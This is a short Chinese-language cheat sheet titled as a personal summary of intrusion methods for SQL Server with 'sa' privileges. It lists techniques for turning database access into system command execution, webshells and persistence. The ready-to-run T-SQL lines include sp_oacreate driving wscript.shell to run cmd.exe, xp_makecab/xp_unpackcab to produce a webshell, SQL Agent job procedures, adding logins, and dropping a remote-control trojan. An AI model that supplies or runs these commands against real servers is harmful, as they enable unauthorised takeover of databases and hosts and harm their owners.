SA权限入侵方法个人总结

来源：互联网

1。xp_cmdshell执行命令

2。OAcreate

3。JOB

4。xp_regread读web路径 上传asp木马

5。xp_regread读web路径 用sp_makewebtask生成一句话木马

6。差异备份

7。爆数据 进后台

8。declare @shell int exec sp_oacreate 'wscrīpt.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c 命令'-- 执行命令

9。沙盒工具

10。openrowset命令连接本机测试sa若口令

11。bcp写文件

12。bulk insert读取conn.asp 拿SA密码~

13。利用sp_addlogin加一个sa用户进数据库

14。把注册表里沙盒的开关打开，找一个ACC注入点用岁月的工具执行命令

15。 都要有sa权限或者master库的db权限
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp' 打包

EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp' 解包，可以用于得到webshell

EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp' 读cmd的内容

16。exec master..xp_servicecontrol 'start','SQLSERVERAGENT' 开SQLSERVERAGENT服务
利用sp_add_job,sp_add_jobstep,sp_add_jobserver,sp_start_job，sp_addtask这些存储过

程可以得到webshell或者系统权限

17。openrowset 命令连接ACCESS数据库 实现跨库查询！ 要知道ACCESS数据库的绝对路径 还要有SA权限
工具不行就试手工

18。丢个远控上去直接执行

暂时这些。